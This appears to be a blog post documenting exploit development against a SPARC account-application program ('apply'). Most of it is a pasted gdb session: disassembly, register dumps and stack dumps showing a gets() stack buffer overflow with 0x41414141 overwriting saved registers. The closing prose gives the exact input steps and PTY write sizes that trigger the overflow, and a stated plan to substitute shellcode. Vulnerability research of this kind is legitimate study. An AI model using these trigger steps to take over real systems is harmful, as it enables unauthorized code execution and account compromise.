                             0x000116a4 <Acct+484>:	st  %g1, [ %fp + -20 ]
                                                                              0x000116a8 <Acct+488>:	ld  [ %fp + -20 ], %g1
                                                                                                                              0x000116ac <Acct+492>:	cmp  %g1, 0
                   0x000116b0 <Acct+496>:	ble  0x117fc <Acct+828>
                                                                       ---Type <return> to continue, or q <return> to quit---0x000116b4 <Acct+500>:	nop
            0x000116b8 <Acct+504>:	ld  [ %fp + -20 ], %g1
                                                              0x000116bc <Acct+508>:	cmp  %g1, 7
                                                                                                   0x000116c0 <Acct+512>:	bg  0x117fc <Acct+828>
       0x000116c4 <Acct+516>:	nop
                                    0x000116c8 <Acct+520>:	ld  [ %fp + -20 ], %g1
                                                                                      0x000116cc <Acct+524>:	cmp  %g1, 7
                                                                                                                           0x000116d0 <Acct+528>:	bne  0x11708 <Acct+584>
                               0x000116d4 <Acct+532>:	nop
                                                            0x000116d8 <Acct+536>:	sethi  %hi(0x13c00), %g1
                                                                                                                0x000116dc <Acct+540>:	or  %g1, 0x1d8, %o0	! 0x13dd8
                         0x000116e0 <Acct+544>:	call  0x257d8 <printf@plt>
                                                                          0x000116e4 <Acct+548>:	nop
                                                                                                            0x000116e8 <Acct+552>:	sethi  %hi(0x13c00), %g1
                 ---Type <return> to continue, or q <return> to quit---0x000116ec <Acct+556>:	or  %g1, 0x208, %o0	! 0x13e08
                                                                                                                                 0x000116f0 <Acct+560>:	call  0x257d8 <printf@plt>
                                          0x000116f4 <Acct+564>:	nop
                                                                            0x000116f8 <Acct+568>:	call  0x1320c <quit>
                                                                                                                            0x000116fc <Acct+572>:	nop
            0x00011700 <Acct+576>:	b  0x114f4 <Acct+52>
                                                            0x00011704 <Acct+580>:	nop
                                                                                            0x00011708 <Acct+584>:	sethi  %hi(0x25800), %g1
 0x0001170c <Acct+588>:	or  %g1, 0x260, %o5	! 0x25a60 <Acct_inst>
                                                                     0x00011710 <Acct+592>:	ld  [ %fp + -20 ], %g1
                                                                                                                      0x00011714 <Acct+596>:	sll  %g1, 2, %g1
                0x00011718 <Acct+600>:	add  %g1, %o5, %g1
                                                          0x0001171c <Acct+604>:	ld  [ %g1 + 0xc ], %g1
                                                                                                              0x00011720 <Acct+608>:	st  %g1, [ %fp + -24 ]
               ---Type <return> to continue, or q <return> to quit---0x00011724 <Acct+612>:	ld  [ %fp + -24 ], %g1
                                                                                                                      0x00011728 <Acct+616>:	add  %g1, 3, %g1
                0x0001172c <Acct+620>:	st  %g1, [ %fp + -24 ]
                                                              0x00011730 <Acct+624>:	ld  [ %fp + 0x44 ], %g1
                                                                                                               0x00011734 <Acct+628>:	add  %g1, 0x804, %g1
             0x00011738 <Acct+632>:	st  %g1, [ %fp + -28 ]
                                                              0x0001173c <Acct+636>:	ld  [ %fp + -24 ], %g1
                                                                                                              0x00011740 <Acct+640>:	ldub  [ %g1 ], %g1
           0x00011744 <Acct+644>:	sll  %g1, 0x18, %g1
                                                           0x00011748 <Acct+648>:	sra  %g1, 0x18, %g1
                                                                                                           0x0001174c <Acct+652>:	cmp  %g1, 0
    0x00011750 <Acct+656>:	be  0x117c0 <Acct+768>
                                                      0x00011754 <Acct+660>:	nop
                                                                                    0x00011758 <Acct+664>:	ld  [ %fp + -24 ], %g1
                                                                                                                                      ---Type <return> to continue, or q <return> to quit---0x0001175c <Acct+668>:	ldub  [ %g1 ], %g1
                                                                                          0x00011760 <Acct+672>:	sll  %g1, 0x18, %g1
                                                                                                                                           0x00011764 <Acct+676>:	sra  %g1, 0x18, %o5
                                           0x00011768 <Acct+680>:	sethi  %hi(0x29000), %g1
                                                                                                0x0001176c <Acct+684>:	or  %g1, 0x2d1, %g1	! 0x292d1 <_ctype+1>
                    0x00011770 <Acct+688>:	ldub  [ %o5 + %g1 ], %g1
                                                                        0x00011774 <Acct+692>:	and  %g1, 0xff, %g1
                                                                                                                   0x00011778 <Acct+696>:	srl  %g1, 3, %g1
                0x0001177c <Acct+700>:	and  %g1, 1, %g1
                                                        0x00011780 <Acct+704>:	cmp  %g1, 0
                                                                                           0x00011784 <Acct+708>:	bne  0x117c0 <Acct+768>
0x00011788 <Acct+712>:	nop
                            0x0001178c <Acct+716>:	add  %fp, -28, %o2
                                                                          0x00011790 <Acct+720>:	ld  [ %o2 ], %o5
                                                                                                                        ---Type <return> to continue, or q <return> to quit---0x00011794 <Acct+724>:	add  %fp, -24, %o4
                                                                          0x00011798 <Acct+728>:	ld  [ %o4 ], %g1
                                                                                                                        0x0001179c <Acct+732>:	ldub  [ %g1 ], %o3
                  0x000117a0 <Acct+736>:	inc  %g1
                                                        0x000117a4 <Acct+740>:	st  %g1, [ %o4 ]
                                                                                                0x000117a8 <Acct+744>:	mov  %o5, %g1
                                                                                                                                     0x000117ac <Acct+748>:	stb  %o3, [ %g1 ]
                                 0x000117b0 <Acct+752>:	inc  %o5
                                                                0x000117b4 <Acct+756>:	st  %o5, [ %o2 ]
                                                                                                        0x000117b8 <Acct+760>:	b  0x1173c <Acct+636>
      0x000117bc <Acct+764>:	nop
                                    0x000117c0 <Acct+768>:	ld  [ %fp + -28 ], %g1
                                                                                      0x000117c4 <Acct+772>:	clrb  [ %g1 ]
                                                                                                                             0x000117c8 <Acct+776>:	sethi  %hi(0x29400), %g1
                                ---Type <return> to continue, or q <return> to quit---0x000117cc <Acct+780>:	or  %g1, 0xdc, %g1	! 0x294dc <action>
           0x000117d0 <Acct+784>:	ld  [ %g1 ], %g1
                                                        0x000117d4 <Acct+788>:	cmp  %g1, 1
                                                                                           0x000117d8 <Acct+792>:	bne  0x117f0 <Acct+816>
0x000117dc <Acct+796>:	nop
                            0x000117e0 <Acct+800>:	sethi  %hi(0x25800), %g1
                                                                                0x000117e4 <Acct+804>:	or  %g1, 0x2b4, %o0	! 0x25ab4 <Acct_inst3>
       0x000117e8 <Acct+808>:	call  0x13274 <blurb>
                                                     0x000117ec <Acct+812>:	nop
                                                                                    0x000117f0 <Acct+816>:	clr  [ %fp + -32 ]
                                                                                                                                  0x000117f4 <Acct+820>:	b  0x1183c <Acct+892>
                                     0x000117f8 <Acct+824>:	nop
                                                                    0x000117fc <Acct+828>:	sethi  %hi(0x13c00), %g1
                                                                                                                        0x00011800 <Acct+832>:	or  %g1, 0x238, %o0	! 0x13e38
                                 ---Type <return> to continue, or q <return> to quit---0x00011804 <Acct+836>:	call  0x257d8 <printf@plt>
                                                                                                                                          0x00011808 <Acct+840>:	nop
                            0x0001180c <Acct+844>:	b  0x114f4 <Acct+52>
                                                                            0x00011810 <Acct+848>:	nop
                                                                                                            0x00011814 <Acct+852>:	sethi  %hi(0x13c00), %g1
                 0x00011818 <Acct+856>:	or  %g1, 0x258, %o0	! 0x13e58
                                                                         0x0001181c <Acct+860>:	call  0x257d8 <printf@plt>
                                                                                                                          0x00011820 <Acct+864>:	nop
            0x00011824 <Acct+868>:	sethi  %hi(0x25800), %g1
                                                                0x00011828 <Acct+872>:	or  %g1, 0x290, %o0	! 0x25a90 <Acct_inst2>
                                                                                                                                      0x0001182c <Acct+876>:	call  0x13274 <blurb>
                                     0x00011830 <Acct+880>:	nop
                                                                    0x00011834 <Acct+884>:	b  0x114f4 <Acct+52>
                                                                                                                    0x00011838 <Acct+888>:	nop
    ---Type <return> to continue, or q <return> to quit---0x0001183c <Acct+892>:	ld  [ %fp + -32 ], %i0
                                                                                                              0x00011840 <Acct+896>:	ret
                                                                                                                                            0x00011844 <Acct+900>:	restore
                                End of assembler dump.
                                                      (gdb) Breakpoint 1 at 0x11840
                                                                                   (gdb) Starting program: /home/bazz/latest/apply-1.2-stock/apply
    (no debugging symbols found)
                                warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
                                                                                                                         (no debugging symbols found)
      (no debugging symbols found)
                                  (no debugging symbols found)
                                                              (no debugging symbols found)
                                                                                          (no debugging symbols found)
                                                                                                                      (no debugging symbols found)
   (no debugging symbols found)

                               Welcome to -----, our host that handles account applications.

                                                                                                       This program collects information needed to create accounts, and queues
                               applications for action by the system administrator.  When all your
                                                                                                  information has been collected, you will have the chance to review your
                          application and re-enter any information that is not correct.

                                                                                       If you make a mistake in typing, you can back up on the line by pressing the
                    DELETE key.  Do not use the BACKSPACE or arrow keys to delete characters --
                                                                                               your input may appear to have been fixed but will really contain garbage.
                         If you press the RETURN key before noticing an error, do not worry.  Simply
                                                                                                    continue answering questions, and re-enter the information later during the
                                review phase.

                                             Press RETURN to continue.
                                                                      Do you already have an account with us (y or n)?
                                                                                                                       Enter your chosen login name.  It can be up to 8 characters long, and should
                                                    only use lowercase letters and digits.  Please use your first initial and
                                                                                                                             last name, as in jdoe, unless you have a strong preference otherwise.
                                                   Login name?
                                                               Please enter your full name.  Be sure to use upper and lower case, as in
                                                                                                                                       John Q. Public.  It is very important to get this right, as this is how
                                                               your name will appear on lab access lists and in mail messages you send.
                                                                                                                                       Full name?
   Enter a password consisting of printable characters, spaces or tabs.
                                                                       It can be as long as you like, but only the first 8 characters matter.
                                                                                                                                             Do not use your login or real name in any form -- too easy to guess.
                                                                  **-*-* Do not give your password to anybody under any circumstances! *-*-**

                                                                                                                                             As you type in your password, characters will not be echoed to your screen.
                                                                         This is to protect your account.  To be sure you did not mis-type anything,
     you will be asked to enter your password a second time.

                                                            Password:
                                                                         Again:


                                                                               Please describe yourself by choosing one of these menu items:

                                                                                                                                            1) ugrad    Undergraduate student enrolled in one or more CS courses
                                                                 2) grad     Graduate student enrolled in one or more CS courses
                                                                                                                                3) alumni   Alumnus of Math and CS
                       4) faculty  Member of the Math and CS faculty
                                                                    5) staff    Member of the Math and CS professional or classified staff
                                                                                                                                          6) crtsy    Courtesy account applicant that has spoken to the Sys Admin
                                                                  7)          None of the above.  (This will abandon the application!)
                                                                                                                                      Menu item number [1-7] or command [tpx?] : You must select one of the choices.
                                                                     Do you want to just forget the whole thing (y or n)? Menu item number [1-7] or command [tpx?] :
                      Program received signal SIGSEGV, Segmentation fault.
                                                                          0x00011588 in Acct ()
                                                                                               (gdb) Undefined command: "rx".  Try "help".
                                                                                                                                          (gdb) Value can't be converted to integer.
                                     (gdb) g0             0x0	0
                                                                 g1             0x31	49
                                                                                          g2             0x0	0
                                                                                                                 g3             0x0	0
                                                                                                                                         g4             0x0	0
                 g5             0x0	0
                                         g6             0x0	0
                                                                 g7             0x0	0
                                                                                         o0             0x28d90	167312
                                                                                                                      o1             0x28d92	167314
      o2             0x2919e	168350
                                      o3             0x1	1
                                                                 o4             0xff33c008	-13385720
                                                                                                         o5             0x0	0
                                                                                                                                 ---Type <return> to continue, or q <return> to quit---sp             0xffbefd40	0xffbefd40
                                                                                  o7             0x11510	70928
                                                                                                                     l0             0x41414141	1094795585
          l1             0x41414141	1094795585
                                                  l2             0x41414141	1094795585
                                                                                          l3             0x41414141	1094795585
                                                                                                                                  l4             0x41414141	1094795585
                          l5             0x41414141	1094795585
                                                                  l6             0x41414141	1094795585
                                                                                                          l7             0x41414141	1094795585
   i0             0x41414141	1094795585
                                          i1             0x41414141	1094795585
                                                                                  i2             0x41414141	1094795585
                                                                                                                          i3             0x41414141	1094795585
                  ---Type <return> to continue, or q <return> to quit---i4             0x41414141	1094795585
                                                                                                                  i5             0x41414141	1094795585
          fp             0x41414141	0x41414141
                                                  i7             0x41414141	1094795585
                                                                                          y              0x0	0
                                                                                                                 psr            0xfe001005	-33550331
         wim            0x0	0
                                 tbr            0x0	0
                                                         pc             0x11588	0x11588 <Acct+200>
                                                                                                  npc            0x1158c	0x1158c <Acct+204>
   fsr            0x0	0
                         csr            0x0	0
                                                 (gdb) (gdb) (gdb) Delete all breakpoints? (y or n) (gdb) Dump of assembler code for function askyorn:
       0x00012a30 <askyorn+0>:	save  %sp, -1152, %sp
                                                     0x00012a34 <askyorn+4>:	st  %i0, [ %fp + 0x44 ]
                                                                                                       0x00012a38 <askyorn+8>:	clr  [ %fp + -1044 ]
     0x00012a3c <askyorn+12>:	ld  [ %fp + -1044 ], %g1
                                                        0x00012a40 <askyorn+16>:	cmp  %g1, 9
                                                                                                   0x00012a44 <askyorn+20>:	bg  0x12b20 <askyorn+240>
          0x00012a48 <askyorn+24>:	nop
                                            0x00012a4c <askyorn+28>:	sethi  %hi(0x15000), %g1
                                                                                                0x00012a50 <askyorn+32>:	or  %g1, 0x328, %o0	! 0x15328 <_end+4039>
                             0x00012a54 <askyorn+36>:	ld  [ %fp + 0x44 ], %o1
                                                                               0x00012a58 <askyorn+40>:	call  0x257d8 <printf@plt>
                                                                                                                                  0x00012a5c <askyorn+44>:	nop
                    0x00012a60 <askyorn+48>:	add  %fp, -1040, %g1
                                                                    ---Type <return> to continue, or q <return> to quit---0x00012a64 <askyorn+52>:	mov  %g1, %o0
                     0x00012a68 <askyorn+56>:	call  0x25808 <gets@plt>
                                                                        0x00012a6c <askyorn+60>:	nop
                                                                                                            0x00012a70 <askyorn+64>:	ldub  [ %fp + -1040 ], %g1
                   0x00012a74 <askyorn+68>:	sll  %g1, 0x18, %g1
                                                                   0x00012a78 <askyorn+72>:	sra  %g1, 0x18, %g1
                                                                                                                   0x00012a7c <askyorn+76>:	st  %g1, [ %fp + -1052 ]
                        0x00012a80 <askyorn+80>:	ld  [ %fp + -1052 ], %g1
                                                                                0x00012a84 <askyorn+84>:	cmp  %g1, 0x59
                                                                                                                              0x00012a88 <askyorn+88>:	be  0x12ae0 <askyorn+176>
                                 0x00012a8c <askyorn+92>:	nop
                                                                    0x00012a90 <askyorn+96>:	ld  [ %fp + -1052 ], %g1
                                                                                                                        0x00012a94 <askyorn+100>:	cmp  %g1, 0x59
                      0x00012a98 <askyorn+104>:	bg  0x12ab8 <askyorn+136>
                                                                         ---Type <return> to continue, or q <return> to quit---0x00012a9c <askyorn+108>:	nop
                    0x00012aa0 <askyorn+112>:	ld  [ %fp + -1052 ], %g1
                                                                        0x00012aa4 <askyorn+116>:	cmp  %g1, 0x4e
                                                                                                                      0x00012aa8 <askyorn+120>	be  0x12af0 <askyorn+192>
                         0x00012aac <askyorn+124>:	nop
                                                            0x00012ab0 <askyorn+128>:	b  0x12afc <askyorn+204>
                                                                                                                0x00012ab4 <askyorn+132>:	nop
    0x00012ab8 <askyorn+136>:	ld  [ %fp + -1052 ], %g1
                                                        0x00012abc <askyorn+140>:	cmp  %g1, 0x6e
                                                                                                      0x00012ac0 <askyorn+144>:	be  0x12af0 <askyorn+192>
          0x00012ac4 <askyorn+148>:	nop
                                            0x00012ac8 <askyorn+152>:	ld  [ %fp + -1052 ], %g1
                                                                                                0x00012acc <askyorn+156>:	cmp  %g1, 0x79
                                                                                                                                              0x00012ad0 <askyorn+160>:	be  0x12ae0 <askyorn+176>
                                                         ---Type <return> to continue, or q <return> to quit---0x00012ad4 <askyorn+164>:	nop
    0x00012ad8 <askyorn+168>:	b  0x12afc <askyorn+204>
                                                        0x00012adc <askyorn+172>:	nop
                                                                                            0x00012ae0 <askyorn+176>:	mov  1, %g1	! 0x1
                                                                                                                                             0x00012ae4 <askyorn+180>:	st  %g1, [ %fp + -1048 ]
                                                0x00012ae8 <askyorn+184>:	b  0x12b24 <askyorn+244>
                                                                                                        0x00012aec <askyorn+188>:	nop
                                                                                                                                            0x00012af0 <askyorn+192>:	clr  [ %fp + -1048 ]
                                            0x00012af4 <askyorn+196>:	b  0x12b24 <askyorn+244>
                                                                                                0x00012af8 <askyorn+200>:	nop
                                                                                                                                    0x00012afc <askyorn+204>:	sethi  %hi(0x15000), %g1
                                        0x00012b00 <askyorn+208>:	or  %g1, 0x338, %o0	! 0x15338 <_end+4055>
                                                                                                                     0x00012b04 <askyorn+212>:	call  0x257d8 <printf@plt>
                          0x00012b08 <askyorn+216>:	nop
                                                            ---Type <return> to continue, or q <return> to quit---0x00012b0c <askyorn+220>:	ld  [ %fp + -1044 ], %g1
                        0x00012b10 <askyorn+224>:	inc  %g1
                                                                0x00012b14 <askyorn+228>:	st  %g1, [ %fp + -1044 ]
                                                                                                                        0x00012b18 <askyorn+232>:	b  0x12a3c <askyorn+12>
                               0x00012b1c <askyorn+236>:	nop
                                                                    0x00012b20 <askyorn+240>:	clr  [ %fp + -1048 ]
                                                                                                                    0x00012b24 <askyorn+244>:	ld  [ %fp + -1048 ], %i0
                        0x00012b28 <askyorn+248>:	ret
                                                            0x00012b2c <askyorn+252>:	restore
                                                                                                End of assembler dump.
                                                                                                                      (gdb) Breakpoint 2 at 0x12b28
    (gdb) Num Type           Disp Enb Address    What
                                                     2   breakpoint     keep y   0x00012b28 <askyorn+248>
                                                                                                         (gdb) Delete all breakpoints? (y or n) (gdb) Breakpoint 3 at 0x12b28
                              (gdb) The program being debugged has been started already.
                                                                                        Start it from the beginning? (y or n) Starting program: /home/bazz/latest/apply-1.2-stock/apply
                                         (no debugging symbols found)
                                                                     warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
               (no debugging symbols found)
                                           (no debugging symbols found)
                                                                       (no debugging symbols found)
                                                                                                   (no debugging symbols found)
                                                                                                                               (no debugging symbols found)
            (no debugging symbols found)
                                        (no debugging symbols found)

                                                                    Welcome to ----, our host that handles account applications.

                                                                                                                                            This program collects information needed to create accounts, and queues
                                                                    applications for action by the system administrator.  When all your
                                                                                                                                       information has been collected, you will have the chance to review your
                                                               application and re-enter any information that is not correct.

                                                                                                                            If you make a mistake in typing, you can back up on the line by pressing the
                                                         DELETE key.  Do not use the BACKSPACE or arrow keys to delete characters --
                                                                                                                                    your input may appear to have been fixed but will really contain garbage.
                                                              If you press the RETURN key before noticing an error, do not worry.  Simply
                                                                                                                                         continue answering questions, and re-enter the information later during the
                                                                     review phase.

                                                                                  Press RETURN to continue.
                                                                                                           Do you already have an account with us (y or n)?
             Breakpoint 3, 0x00012b28 in askyorn ()
                                                   (gdb) Continuing.

                                                                    Enter your chosen login name.  It can be up to 8 characters long, and should
 only use lowercase letters and digits.  Please use your first initial and
                                                                          last name, as in jdoe, unless you have a strong preference otherwise.
Login name?
            Please enter your full name.  Be sure to use upper and lower case, as in
                                                                                    John Q. Public.  It is very important to get this right, as this is how
            your name will appear on lab access lists and in mail messages you send.
                                                                                    Full name?
                                                                                               Enter a password consisting of printable characters, spaces or tabs.
                    It can be as long as you like, but only the first 8 characters matter.
                                                                                          Do not use your login or real name in any form -- too easy to guess.
               **-*-* Do not give your password to anybody under any circumstances! *-*-**

                                                                                          As you type in your password, characters will not be echoed to your screen.
                      This is to protect your account.  To be sure you did not mis-type anything,
                                                                                                 you will be asked to enter your password a second time.

         Password:
                      Again:


                            Please describe yourself by choosing one of these menu items:

                                                                                         1) ugrad    Undergraduate student enrolled in one or more CS courses
              2) grad     Graduate student enrolled in one or more CS courses
                                                                             3) alumni   Alumnus of Math and CS
                                                                                                                   4) faculty  Member of the Math and CS faculty
                 5) staff    Member of the Math and CS professional or classified staff
                                                                                       6) crtsy    Courtesy account applicant that has spoken to the Sys Admin
               7)          None of the above.  (This will abandon the application!)
                                                                                   Menu item number [1-7] or command [tpx?] : You must select one of the choices.
                  Do you want to just forget the whole thing (y or n)?
                                                                       Breakpoint 3, 0x00012b28 in askyorn ()
                                                                                                             (gdb) $ unknown mode: cooked
$ $ $ $ $ $ (gdb) $ $ (gdb) $ $
$
$ exit
(gdb) x/96x $sp
0xffbef8c0:     0x000291a0      0x00028d91      0xff000000      0x00ff0000
0xffbef8d0:     0x0000ff00      0x81000000      0x7efefeff      0x81010100
0xffbef8e0:     0x00000000      0x00029190      0xff343a54      0x00000000
0xffbef8f0:     0xff33c008      0x00000000      0xffbefd40      0x00011630
0xffbef900:     0x00000000      0xff342fb0      0x00013da8      0x00000000
0xffbef910:     0x000292d1      0x00000024      0x00013da4      0x80000000
0xffbef920:     0x00000000      0x0000006e      0x00000000      0x00000000
0xffbef930:     0x6e414141      0x41414141      0x41414141      0x41414141
0xffbef940:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef950:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef960:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef970:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef980:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef990:     0x41414141      0x41414141      0x41414141      0x41414141
---Type <return> to continue, or q <return> to quit---
0xffbef9a0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9b0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9c0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9d0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9e0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9f0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa00:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa10:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa20:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa30:     0x41414141      0x41414141      0x41414141      0x41414141
(gdb) i r
g0             0x0      0
g1             0x6e     110
g2             0x0      0
g3             0x0      0
g4             0x0      0
g5             0x0      0
g6             0x0      0
g7             0x0      0
o0             0xffbef930       -4261584
o1             0xffbeff72       -4259982
o2             0x2919e  168350
o3             0x1      1
o4             0xff33c008       -13385720
o5             0x0      0
---Type <return> to continue, or q <return> to quit---
sp             0xffbef8c0       0xffbef8c0
o7             0x12a68  76392
l0             0x291a0  168352
l1             0x28d91  167313
l2             0xff000000       -16777216
l3             0xff0000 16711680
l4             0xff00   65280
l5             0x81000000       -2130706432
l6             0x7efefeff       2130640639
l7             0x81010100       -2130640640
i0             0x0      0
i1             0x29190  168336
i2             0xff343a54       -13354412
i3             0x0      0
---Type <return> to continue, or q <return> to quit---
i4             0xff33c008       -13385720
i5             0x0      0
fp             0xffbefd40       0xffbefd40
i7             0x11630  71216
y              0x0      0
psr            0xfe401005       -29356027
wim            0x0      0
tbr            0x0      0
pc             0x12b28  0x12b28 <askyorn+248>
npc            0x12b2c  0x12b2c <askyorn+252>
fsr            0x0      0
csr            0x0      0
(gdb) x/96x $sp
0xffbef8c0:     0x000291a0      0x00028d91      0xff000000      0x00ff0000
0xffbef8d0:     0x0000ff00      0x81000000      0x7efefeff      0x81010100
0xffbef8e0:     0x00000000      0x00029190      0xff343a54      0x00000000
0xffbef8f0:     0xff33c008      0x00000000      0xffbefd40      0x00011630
0xffbef900:     0x00000000      0xff342fb0      0x00013da8      0x00000000
0xffbef910:     0x000292d1      0x00000024      0x00013da4      0x80000000
0xffbef920:     0x00000000      0x0000006e      0x00000000      0x00000000
0xffbef930:     0x6e414141      0x41414141      0x41414141      0x41414141
0xffbef940:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef950:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef960:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef970:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef980:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef990:     0x41414141      0x41414141      0x41414141      0x41414141
---Type <return> to continue, or q <return> to quit---
0xffbef9a0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9b0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9c0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9d0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9e0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9f0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa00:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa10:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa20:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa30:     0x41414141      0x41414141      0x41414141      0x41414141
(gdb) x/5i $pc
0x12b28 <askyorn+248>:  ret
0x12b2c <askyorn+252>:  restore
0x12b30 <mkpasswd>:     save  %sp, -136, %sp
0x12b34 <mkpasswd+4>:   st  %i0, [ %fp + 0x44 ]
0x12b38 <mkpasswd+8>:   add  %fp, -28, %g1
(gdb) si
0x00012b2c in askyorn ()
                        (gdb) 0x00011638 in Acct ()
                                                   (gdb) 0x0001163c in Acct ()
                                                                              (gdb) 0x00011640 in Acct ()
                                                                                                         (gdb) $ ^M^Mj: not found
                                                                                                                                 $ unknown mode: cho
     $ ^M^M: not found
                      $ $
^M^M: not found
               $ stty cooked
                            $
$ exit
(gdb) x/5i $pc
0x11640 <Acct+384>:     be  0x114f4 <Acct+52>
0x11644 <Acct+388>:     nop
0x11648 <Acct+392>:     call  0x1320c <quit>
0x1164c <Acct+396>:     nop
0x11650 <Acct+400>:     b  0x114f4 <Acct+52>
(gdb) x/96x $sp
0xffbefd40:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefd50:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefd60:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefd70:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefd80:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefd90:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefda0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefdb0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefdc0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefdd0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefde0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefdf0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe00:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe10:     0x41414141      0x41414141      0x41414141      0x41414141
---Type <return> to continue, or q <return> to quit---
0xffbefe20:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe30:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe40:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe50:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe60:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe70:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe80:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe90:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefea0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefeb0:     0x41414141      0x41414141      0x41414141      0x41414141
(gdb) i r
g0             0x0      0
g1             0x0      0
g2             0x0      0
g3             0x0      0
g4             0x0      0
g5             0x0      0
g6             0x0      0
g7             0x0      0
o0             0x0      0
o1             0x29190  168336
o2             0xff343a54       -13354412
o3             0x0      0
o4             0xff33c008       -13385720
o5             0x0      0
---Type <return> to continue, or q <return> to quit---
sp             0xffbefd40       0xffbefd40
o7             0x11630  71216
l0             0x41414141       1094795585
l1             0x41414141       1094795585
l2             0x41414141       1094795585
l3             0x41414141       1094795585
l4             0x41414141       1094795585
l5             0x41414141       1094795585
l6             0x41414141       1094795585
l7             0x41414141       1094795585
i0             0x41414141       1094795585
i1             0x41414141       1094795585
i2             0x41414141       1094795585
i3             0x41414141       1094795585
---Type <return> to continue, or q <return> to quit---
i4             0x41414141       1094795585
i5             0x41414141       1094795585
fp             0x41414141       0x41414141
i7             0x41414141       1094795585
y              0x0      0
psr            0xfe401001       -29356031
wim            0x0      0
tbr            0x0      0
pc             0x11640  0x11640 <Acct+384>
npc            0x11644  0x11644 <Acct+388>
fsr            0x0      0
csr            0x0      0
(gdb)

You can’t even see what I type often times, cause the echo has to be turned off for some reason…. It gets tough, you cannot CTRL-C out of the session into GDB because you are in RAW MODE. so I set a breakpoint:

b *0x00012b28

which is inside askyorn before the ret restore. Note that it will take another ret/restore to load the infected return address.
and suffer having to go through it once before I actually wanted to (not bad really, that’s lucky). once I found a good break point, went thru the program, breaked. I put my terminal into cooked mode by invoking gdb shell and calling

stty cooked; stty echo;

that’s what let me get the pretty gdb printouts again…

In summary to get to this wonderful stack vulnerability location:
1) say you’re a new user
2) type in your name / username /password twice. then hit ‘x’
3) at the ‘X’, do an ‘n’ without hitting CTRL-J followed immediately by 1600 of buffer trash.

To follow up here would be to use the getsmashoffset program I created to help locate exactly how many bytes it takes to the %fp and then to smash the fuck out of it with some shellcode in the PTY buffer instead of ‘A’

Checking PTY buffer send size
I originally got back to promised land by using

write (fd_master,buff2,200);

and I sent enough increments of 200 to equal 1600 followed by a CTRL-J
I have now tested that

write (fd_master,buff2,1600);

will also work just right.

Leave a Reply

Your email address will not be published. Required fields are marked *

*